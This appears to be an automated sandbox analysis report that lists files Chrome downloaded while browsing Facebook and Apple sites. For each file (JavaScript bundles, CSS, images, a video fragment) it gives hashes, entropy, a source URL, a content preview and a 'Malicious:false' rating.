                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6316)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):89262
                                                                                                                                                                                                                                Entropy (8bit):5.433844673295272
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:EKzHfiewWzy+0OqtgKHQilCryLQa+gRd9NjppfpVDl6LvuAsu1UavNult+TFYTJT:EuH3zm3HZYyMaLRBcBvst+TFYTJT
                                                                                                                                                                                                                                MD5:E8D3A6185D998234F144081623E5B457
                                                                                                                                                                                                                                SHA1:27121EFCD7BC165C1EF9948E7FD7D265F09CBC53
                                                                                                                                                                                                                                SHA-256:CA6A438B9F61C9A965A1586A4D5750E3366861A20B74C2FF01D1B44CCE47B701
                                                                                                                                                                                                                                SHA-512:5CDAEBEAF6E79743518E54692CA70E4E0AABCFDBF8CF4A565611292072FCDE763F06287D18268B9C58E0BE32CC8D4A2157DD3C8E95D48D589BE9D7BE91683553
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractSidebarDefaultRouterLink.react",["GeoDomID","Link.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(a){var b=a.children,e=a["aria-describedby"],f=a["aria-labelledby"];a=babelHelpers.objectWithoutPropertiesLoose(a,["children","aria-describedby","aria-labelledby"]);f=d("GeoDomID").useApplyGeoDomIDsDirectly({"aria-describedby":(e=e)!=null?e:void 0,"aria-labelledby":(e=f)!=null?e:void 0});e=f.ref;f=babelHelpers.objectWithoutPropertiesLoose(f,["ref"]);return i.jsx(c("Link.react"),babelHelpers["extends"]({linkRef:e},a,f,{children:b}))}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("AbstractSidebarRouterLinkContext",["AbstractSidebarDefaultRouterLink.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(c("AbstractSidebarDefaultRouterLink.react"));g["default"]=b}),98);.__d("AbstractSidebarLink.react",["cx","AbstractSidebarRouterLinkContext","GeoDomID","joinClasses","
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (17135)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):59956
                                                                                                                                                                                                                                Entropy (8bit):5.264511741037863
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:n9txPZhgztxqYWkfk2iXUymBqBVvjogt4+wXZs8n1i+wcHuZRsF7d6BOLQuR4gI7:Hhwt2woZmo
                                                                                                                                                                                                                                MD5:FC79B275417070FC0052283D97BB5B31
                                                                                                                                                                                                                                SHA1:0E53644F25080A5E627B6EBA7CD265DE4AD4C7D2
                                                                                                                                                                                                                                SHA-256:F66EF0A2BC1E35C7FDBC6DD68862D6FC17AB43956C7C6FE1BC39AD9892D7A168
                                                                                                                                                                                                                                SHA-512:2212C600F5EBBCAFAFDEA64C6DB899716A09578C7F718FBF43D82DDDD5DFA8D10AA37AE8DFB9868CBBF563F278E88C1180A0D6D4CD8E3F82B64F25D8EC2EB7E1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/9NORmZkKZyv.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("CLS",[],(function(a,b,c,d,e,f){"use strict";var g=typeof ((b=window.PerformanceObserver)==null?void 0:(c=b.supportedEntryTypes)==null?void 0:c.includes)==="function"&&window.PerformanceObserver.supportedEntryTypes.includes("layout-shift");function a(){if(!g)return null;var a=0,b=0,c=[],d=new window.PerformanceObserver(function(d){for(var d=d.getEntries(),e=Array.isArray(d),f=0,d=e?d:d[typeof Symbol==="function"?Symbol.iterator:"@@iterator"]();;){var g;if(e){if(f>=d.length)break;g=d[f++]}else{f=d.next();if(f.done)break;g=f.value}g=g;if(!g.hadRecentInput){var h=c[0],i=c[c.length-1];b&&g.startTime-i.startTime<1e3&&g.startTime-h.startTime<5e3?(b+=g.value,c.push(g)):(b=g.value,c=[g]);b>a&&(a=b)}}});d.observe({buffered:!0,type:"layout-shift"});return function(){d.disconnect();return a}}f.getCLSCallback=a}),66);.__d("getReactComponentDisplayName",[],(function(a,b,c,d,e,f){"use strict";function a(a){var b=a.displayName;if(b!=null)return b;return a.name!=null?a.name:"Rea
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):625
                                                                                                                                                                                                                                Entropy (8bit):4.952963038414406
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:UXv7Fc4DpWNRKL+BK/sgl9hrIYerznR3zueIDRTLG9fkVlF38LG0DAvYodXotHNu:u6oTTlrIYevhTuKtLG0MAodXcNu
                                                                                                                                                                                                                                MD5:2DFF575911FD65E601AC64F87F07D5D1
                                                                                                                                                                                                                                SHA1:AE28A08E8E333C9234AD0D024D0865E5E36C5B2C
                                                                                                                                                                                                                                SHA-256:7DF89772DEFA309D97987A7D985ED3F0DA91D81180FE69BB11DA8A8B181B418D
                                                                                                                                                                                                                                SHA-512:3E6530272A6497738135CE998D2221588C487A27F20BD3745224F3FA43FDBFF8A2C8DDD42709B01B1CBF8FCE8EB6DC1EC9FADFE5FCF1AAEF0DE5B18CAAA6CBD7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-42d04e97.js
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const n=function(){window.MusicKitComponents={version:"2350.1.0"}};export{n as g}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):10850
                                                                                                                                                                                                                                Entropy (8bit):7.975671955265493
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:xmG7orlt9U6+7/cWgN2ZPM/wMzJcRFxivdPDSr+Tazqt7s/sgHRKUjfAGAeseF0Y:sOwltaF/pgEZwNcxfrz8s0g8UjfAGZlR
                                                                                                                                                                                                                                MD5:DF4F4BD424E27B3EEFF5DFF4D4B5A82A
                                                                                                                                                                                                                                SHA1:00EDCBC57BE597D1431AA7388E91F2DA24DA141F
                                                                                                                                                                                                                                SHA-256:E929EE6594A82B80C5463DCFD43E675919595DA8E52D097EC52CD709A8E80FFA
                                                                                                                                                                                                                                SHA-512:8BB27E44C60312587C143E0F83F4CDB1DBCF8532E49408C03DCBA3D3C6DFC5EE4679B9E8F9E98C9876F3653450B9FC663AEB2E44B65031BC0F159236DD3147E8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/bhwvgLPwlrUGC29L7T2GkUyJe7bPzKxeuRFxEHWG7RCFDP_PtJ5WPtdk6QW-KKMn7Zy2=w526-h296-rw
                                                                                                                                                                                                                                Preview:RIFFZ*..WEBPVP8 N*.......*..(.>]$.E#.!.Z..8...8....9....................?........G.......?G............j?.?.........{......e......._Z/............'.....?.....7.......o......@?.u..S..l...(|..c..k?..k.}.;...z)..........'.#.?...z..9.......OV].........}O.O.O..I......G.7...g./.....>j.I...c...g>.?..^.s.....O.?M.....K.c..?.?.?.~S...-.......O....n..?...b..~... .*... ]...U'.......1...-.........(.G1M.(.Q...%......7v.6...AX..61..[.e0....j...m0C..;0.!........Q....c.-.T...q.9..s........$E..!..f...O.-....9....~fc.?....#......}.d.}d.g..4mDs.2.F..r...b.H....:..q......k`?..f........&...]4.... .u.l.)...X]..u.E}}.u..d.......R....u..s..|...`.)=.<P......t.HpA.b...._f..A)..z..2.v..).w)r.4.P.jb:.....o..k..YC....7....P..|.....FoaR...v..nS>...-.W|..,~H......5...b\.a..........YlM(.`/.q.H...H^..IS8.E..nj...BI.....Ll.QWtJ|.h|.Xp.{a.,kK.e(....T..<..2*$...W}.v.".G.%.!..G."...O.:..k..\..R..g.Jo.....!I4....[.......B..df.......Q..p.l.K.......y{B{>....y.{..>Y$....L
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):231862
                                                                                                                                                                                                                                Entropy (8bit):5.4580370109650715
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:5fLeYH8At6JK37OeR8NteGvQ+AMPpgArl0xYu5s713hW:5fLeYc+6JaH8N7QQGArHu5s713A
                                                                                                                                                                                                                                MD5:3E34065323CCD70417621B0687E56775
                                                                                                                                                                                                                                SHA1:F63D803164D63317D51A708C942FF511725A9E16
                                                                                                                                                                                                                                SHA-256:5EBCE957851EB83517851E8613F012EB45AA4EBB6142B92C30B7D9492C874E22
                                                                                                                                                                                                                                SHA-512:EDB02D4A93A15771FB0768C8A45F3DBAF0908E5C450737D59AF5804840B10E33C0955831B4B6B3F3362A839CC8DBEF2169667F4FDFB40299FDCB80E8A16051EA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4083)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):4295
                                                                                                                                                                                                                                Entropy (8bit):5.30261790907087
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:xqYiUs0iqHjly3HHe+F03J8ZwEuSs86tBjjHyRC:kjVRqZy3xF03J6ZuSsJvXD
                                                                                                                                                                                                                                MD5:65751269352F5C7FF3E35C83A025E2CE
                                                                                                                                                                                                                                SHA1:BEC653BBE4E1160BC9E36F2A9F105B52842883C5
                                                                                                                                                                                                                                SHA-256:14F90CE2F1A178960CE7F253D6FC129D6D0C844600947E9D8CBCE565F88C898E
                                                                                                                                                                                                                                SHA-512:E44A09A92CFDF22D30E8BBACFAB25FACF64CD519C5596DF3D18D5AAD0D8FC21352293B02320ECADE7B444BB6097A01B679F27686E8CD4726B895BD358158082C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/C5TXdJzIETO.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("XDOMScannerResultsControllerRouteBuilder",["jsRouteBuilder"],(function(a,b,c,d,e,f,g){a=c("jsRouteBuilder")("/shared/user_preferences/",Object.freeze({}),void 0);b=a;g["default"]=b}),98);.__d("DOMScanner",["Base64","ConstUriUtils","DOMScannerConfig","FBLogger","JSScheduler","Promise","WebStorage","XDOMScannerResultsControllerRouteBuilder","cometAsyncFetch","isFacebookURI"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j,k=0,l=!1,m=!1;function n(a){return a.startsWith("data:")&&a.includes(";base64,")}function o(a){return n(a)?!1:q(a)}function p(){var a=[],b=document.getElementsByTagName("*");for(var c=0;c<b.length;++c)b[c].shadowRoot!=null&&a.push(b[c]);return a}function q(a){a=d("ConstUriUtils").getUri(a.toString());return a==null?!1:!c("isFacebookURI")(a)}function r(){var a=[],b=p();for(var c=0;c<b.length;c++){var d=b[c],e=d.getBoundingClientRect();e=JSON.stringify({position:{b:e.bottom,l:e.left,r:e.right,t:e.top},size:{h:e.height,w:e.width}},null,2);a.push(["s
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2634)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):9946
                                                                                                                                                                                                                                Entropy (8bit):5.303383252274076
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:NdbWsWxwiKpBpVyPPjg9bt9MVzclvs4oRL19n3kufDi/9secuFjel:LbWsWx3KDXR9THl1iL1l3kufG/9sebjS
                                                                                                                                                                                                                                MD5:9BB28E4E947B15C91F9178EFF5B23264
                                                                                                                                                                                                                                SHA1:87F5AC3AE29A7455DD00F79435B1D91F664F0395
                                                                                                                                                                                                                                SHA-256:9FEC8921027F561C8BD0FDF17C244E35F26ABA8E336571597FCCCD9D42D7A0CA
                                                                                                                                                                                                                                SHA-512:4566D611CDC37D0F4C34D36ABA45AF69036C4A9E155FAAEC80D70B20C24555A319C8227377D9AA7E7EF02077C2E83C050DB8BACCDBF48417D8772F64818AA7A5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.722.c70bd733e7b77d8198f0.js
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[722],{32722:function(e,t,i){var n=i(24178),r=i(76588),o=n.SC.attachDelegate,s={setDelegate:function(e){return o(this,e)},localStorageObject:n.tO.localStorageObject,sessionStorageObject:n.tO.sessionStorageObject},a=n.SC.attachDelegate,c={setDelegate:function(e){return a(this,e)},makeAjaxRequest:n.L5.makeAjaxRequest},l=n.SC.attachDelegate,u=n.SC.hasAnyKeys,p=n.SC.isArray,h=n.tO.saveObjectToStorage,d=n.tO.objectFromStorage,g=n.P0.exponentialBackoff,f=n.EE.valueForKeyPath,S="noTopicConfig",v={blacklistedFields:["capacitySystem","capacitySystemAvailable","capacityDisk","capacityData","capacityDataAvailable"],compoundSeparator:"_",configBaseUrl:"https://xp.apple.com/config/1/report",constraints:{profiles:{AMPWeb:{precedenceOrderedRules:[{filters:"any",fieldConstraints:{clientId:{generateValue:!0,namespace:"AMPWeb_isSignedOut",expirationPeriod:864e5}}},{filters:{valueMatches:{isSignedIn:[!0]}},
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6544)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):13393
                                                                                                                                                                                                                                Entropy (8bit):5.410452822445596
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:6cJVUw5yrnVinZnt250Jrxr0UYrAmKRdeiTzVl7v2Vpfd2A2Ks6DBPjbTUDwCFVW:6SnWVinZnSO355zXv2Vpfd2A2Yjn
                                                                                                                                                                                                                                MD5:9512B522526C50D8D6A8BDFE73A720A0
                                                                                                                                                                                                                                SHA1:0233D6921F5694C7599DAADDBFADBD65C9248068
                                                                                                                                                                                                                                SHA-256:42264DFE70407A2AEFA31B4286D407B44DC9CAA4D61F59637908D1ECED68F595
                                                                                                                                                                                                                                SHA-512:F3A2EEA8EA2A762106B3FCBF1562ADB93D3E68BC573EEE7BA6B6D2581B8E7C604CCF0ADBB65A7E5028BB59EB9130E07C8B11A9937A2CC968D85213229A383968
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/RedpCkzOAc2.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractSearchSource",["Promise"],(function(a,b,c,d,e,f){var g;a=function(){function a(){}var c=a.prototype;c.bootstrap=function(a){var c=this;this.$1||(this.$1=new(g||(g=b("Promise")))(function(a){c.bootstrapImpl(a)}));return this.$1.then(a)};c.search=function(a,b,c){this.searchImpl(a,b,c)};c.bootstrapImpl=function(a){a()};c.searchImpl=function(a,b,c){throw new Error("Abstract method #searchImpl is not implemented.")};c.clearBootstrappedData=function(){this.$1=null};return a}();f["default"]=a}),66);.__d("ExplicitRegistrationReactDispatcher",["ExplicitRegistrationDispatcher"],(function(a,b,c,d,e,f,g){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(){return a.apply(this,arguments)||this}var c=b.prototype;c.dispatch=function(b){a.prototype.dispatch.call(this,b)};return b}(c("ExplicitRegistrationDispatcher"));g["default"]=a}),98);.__d("LayoutColumn.react",["cx","joinClasses","react"],(function(a,b,c,d,e,f,g,h){var i,j=i||d("react");b=j.forward
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (29508)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):47151
                                                                                                                                                                                                                                Entropy (8bit):5.952089202853815
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:ZaxwKkt8KWW40V/WxwHhwWRPyywfeU0C+OEgFFlLpL6ndzxEVaGyZ:nKYb44/WCdPzwmUUvgbLLO5f
                                                                                                                                                                                                                                MD5:1F6B67996C741FC059EA6DDE60A9077A
                                                                                                                                                                                                                                SHA1:D9C9FF4A353A0FE208B7B17B7F78911B6D5DA377
                                                                                                                                                                                                                                SHA-256:5516A7645C0A4B2DC0A892F298A3EC881638B995FECD9FB229C00A5BE09E36D3
                                                                                                                                                                                                                                SHA-512:AD857D7905D220B081D30248330FE71C47CC12CDC5C8CF6F946D6FBAD2FA4B9FED3C08F0C15C8847545E58DE98322FB1BBA52C48EB789F3311BD5C59478561A6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/o2L07-KO0Bj.css"
                                                                                                                                                                                                                                Preview:._51o7{display:block}._51o6{vertical-align:middle}.._1vor{margin:0;padding:0}._1vor+._1vor{padding-top:12px}._3wef{outline:none}._3wee{float:right}._3weg{color:#0454a3;cursor:pointer}.._2kdf{display:inline-block;vertical-align:text-bottom}.._3hyi ._53ij{border:1px solid #ce002f;color:#ce002f}._n2c ._53ij,._3hyi ._53ij{border-radius:2px;box-shadow:0 1px 10px rgba(0, 0, 0, .35);max-width:334px;padding:6px 8px;white-space:pre-line}._n2c ._5v-0,._3hyi ._5v-0{padding-bottom:14px}._n2c ._53il,._3hyi ._53il{padding-top:14px}._n2c ._53im,._3hyi ._53im{padding-right:14px}._n2c ._53im,._3hyi ._53ik{padding-bottom:14px}._n2c ._53in,._3hyi ._53in{padding-left:14px}._n2c ._53il ._53io{background-image:url(/rsrc.php/v3/yQ/r/DvnOCCMHfz-.png);background-repeat:no-repeat;background-size:auto;background-position:-82px -49px}._3hyi ._53il ._53io{background-image:url(/rsrc.php/v3/y0/r/h4RMomoV_uh.png);background-repeat:no-repeat;background-size:auto;background-position:0 -165px}._n2c ._53il ._53io,._3hyi
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2676
                                                                                                                                                                                                                                Entropy (8bit):7.885304942971974
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:hPNyeSlJv5YKYD5en8aGDvyqUSBq95mq0P8kW94mnJPpGRYUpz9daLU59VGov:5H4v+1gMvyqUSozcUd9/JPpuXdb
                                                                                                                                                                                                                                MD5:E83D0CCD004F88265E36FAE521240FA8
                                                                                                                                                                                                                                SHA1:BE550EB1B177EF4761319FF7FAA26D95E22A0B94
                                                                                                                                                                                                                                SHA-256:105F22181D57B719F41F9E17667E8371D45223C9EB919AE0E216317CE9D222B7
                                                                                                                                                                                                                                SHA-512:1F0A46630F67FD8D12F32B988942A991411A6702AD9D383DAB67ECA1FEC7AFF93E458BA2758A91E517A5362B13BC11D0967DB9C9E900372E80C77C58BBF59C2A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFFl...WEBPVP8X..............ALPH.......m.0j...........G...X.......!"R.mkko..g.*D.s^.#..Te... J..9..W"EL..M.S?..m.!]...jw..m.2...5?.Zyw.c.l.yl..U...U..7.U.=....n#)R.jp..~.....v....A.@*1.. .R.^...." %o=.e.f..iu"RD.n.. ...obm.a....,.~..%.. .....5.<..}.S(.L:.n._~.0&."RR).S+....._|.k..E...s].A%-~...... ....|...F"J$.v.h.n.........|.....t...."a.U....\..L1.XBU_..W.-@....)...... .o...$......@...k..U..[.Em>/&.........."(.../YO.oQ.......B.................3..'Cpv.,"D.$...c..@...C!<jG...........`...!.w..=.>+Dv.....Bdf.=...!...P.6D..x.@..j{!M..Z...m..A.@.....z.....I......P......+.`...%.f.I.[....9d....9_\.D.....:j......Q.?@........{...:.6....%.~..%..^.``&M.....}.......1..!..H..g..".......U!.&..0.BdQ"<~...!...O...C?<.w......c..d...m.......k.Ap...2._a6..{..?...e...Z.<h.......R........z4..M..[B....$5....$.....qR..c..k.!?.r8..F.".#&IF....v.)..u.a3.$...%.j].:I...t.O.\.m.$D.T..'l.a..^}..)7...@..x....V..[...-{..#.`........Ob....+."..Jk....^U............
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1048576
                                                                                                                                                                                                                                Entropy (8bit):4.419085087208599
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:UXBazdsxwhQw+x8A2zS9n/tOdyF4IMjeoEqwHFaoEvNXDOe0t:UYRsmK+S96yLNlHFEM
                                                                                                                                                                                                                                MD5:E0FCF3AA6E5F8E7F5772337BF88362F3
                                                                                                                                                                                                                                SHA1:198198ED6EDD3DCFA15C7D20BEF60B6E76DB9C7D
                                                                                                                                                                                                                                SHA-256:3A9E6CD651A38EA8868D8BA83C0ED7157902C99B85DCD247E413CEC4BDA08545
                                                                                                                                                                                                                                SHA-512:E54B50AE138AFDAA5D5266A0768A997817B43C280468B50FFC2A0A732B18808B328C0B103377D969FFAEBDD6C178E2C236BE60677A62874029F28A9F04CDDD0F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/7d/63/19/7d631997-4ce4-6ce9-9141-f0ad3602b2a9/P875466468_Anull_video_gr250_sdr_652x1412-.mp4:2f81d12bd32b61:3
                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 24 x 24, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1315
                                                                                                                                                                                                                                Entropy (8bit):6.699572044474413
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:L5Y6JIZ663SuWh8I+pCLmPQnTbBeX/7vetxw9LIQnJkKk0c:LEZ6mSuU89tPQT9y7R9TJk7
                                                                                                                                                                                                                                MD5:AC1E1C4D6F16359701B059ED4E8246B4
                                                                                                                                                                                                                                SHA1:FF19B30A3B3D8D1765C239B25DBC98CB3263786A
                                                                                                                                                                                                                                SHA-256:45444D590A67D30E8B2FDE01BB6482F829383B64BF14A4B19B86E22FDC319FBB
                                                                                                                                                                                                                                SHA-512:97E16A8A20E00FA17BEB11A5C77768F9FA42E1BD6B797DEB1FAB0A5B477C036A29E1785AA92947264F2E5972C05887969948F43FF4E69D4320A9BEB4B1664831
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...................aPLTEGpL...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E.B.....tRNS..5.Pp.H../.)..hL.M.>a1.3..' -......g@......Z.Yi.....\Q.I.WueU..;.[..?...wyn..}.7z:.=....s..d,.+*".%.....K.A2.C..E.m..kD.ql..Gov.J..t........O#....4]_.B6.Sc...9..R8{...`....<....~............^sx.m....IDAT(.c`....N/q...[y.d...=.Ds...|jF.................X`....}3.g..$....U .arN...x..T....(d+V.7.......kq.N.'g........~...M..9.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13872
                                                                                                                                                                                                                                Entropy (8bit):7.980300182065605
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:Gh6p+Tm8jirohmGIFmiK7Vo/JohQP7sWiPqo2GO:2bnjLb+K/kiRbO
                                                                                                                                                                                                                                MD5:00B14239442EE700C3F044E78B2255F4
                                                                                                                                                                                                                                SHA1:7A048ED492BCA6D58D15C3D28A52D9005F440842
                                                                                                                                                                                                                                SHA-256:425BD8EA4368AAC14378F2B1513C22966DCAC845D143837FC632D1E9C642F749
                                                                                                                                                                                                                                SHA-512:E831C585B5B01A72ED3E912EACF1087F10CD6A25DD29E538D3D6B875864952960CBE2C386281FFA7F159675256F778785A1C8E3AC460E26B575EE392734B2488
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF(6..WEBPVP8X..............VP8 .5..P....*....>.T.H$"..i.PD...7Kw. S.d....^s.....o.<....7..=d~....X...../.........._.}......E.....y./.......................?.?..V.....oc<............................;.>r.[.;.....?.?........?.=.?......#.......>........y..........F.j6.Q.....m..l4.'.8.\H....m..<O..G.qN..B....Fr.K.,..-.I.q.].7;......).H.Bvl..>K..|..Z.a..#G.k..gX..){...#......@M.)!v9.jy9...GLe..q.....$L^.A........#a0..aR.h.Ox 66.p..B(v.t.....f_.i..2.|"..x.......H.L...$...;3r^.qt...].@t.|).U...5..6. 9"..R.>..y.>>..u.8.....]....#e(AA......A...T.6.6.%'m.oYt.m..U.)t......QSz."~+Y^...X...S)H..D..C%.............'.\.1Y"wN..1......DW...*......\..WV...n......;...6QT......E.j.uy.._.y!~..e....Z.9.Y.......o.>.3...E..R.UXM,....hcB. ..Y0..{..aiJ.{.....|.U.8k..D.1..U.8L..gdn........e...R........Pa?r.....<*.7_.~..II..!\.........kDH.......ZP..n.7v....U....h!Gk;o.......,obH.....U..0.....<..O:.m5Q5..>.R.k..U0&...4-..O.&..@..\....q".(..w..../$...D..:.A.:>..&
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (8096)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):55228
                                                                                                                                                                                                                                Entropy (8bit):5.329308796986016
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:c3Rf8me01IhZaorAIZu42ZlJZ4Us/Hlybpypdagqf:ixe0IZu1D4jvlybn
                                                                                                                                                                                                                                MD5:614AF3AA20EF61E30C3FFE0C88FE61DA
                                                                                                                                                                                                                                SHA1:48018D5135B84EF010A2C228C5F4411BE8597357
                                                                                                                                                                                                                                SHA-256:66ED8A76E009F2492B61ABC94BB5A4F0867B60CB397057B4E8A5905AFD9412E2
                                                                                                                                                                                                                                SHA-512:4D9B3D7DF01A2621141775DE8BD58FD43D38AF88598E6A8F14DC0E0DA4A3F900BB5B963826D37D1EBBAE24CC1D4F1026AADCC6184427323EF1D25D48A46101B1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
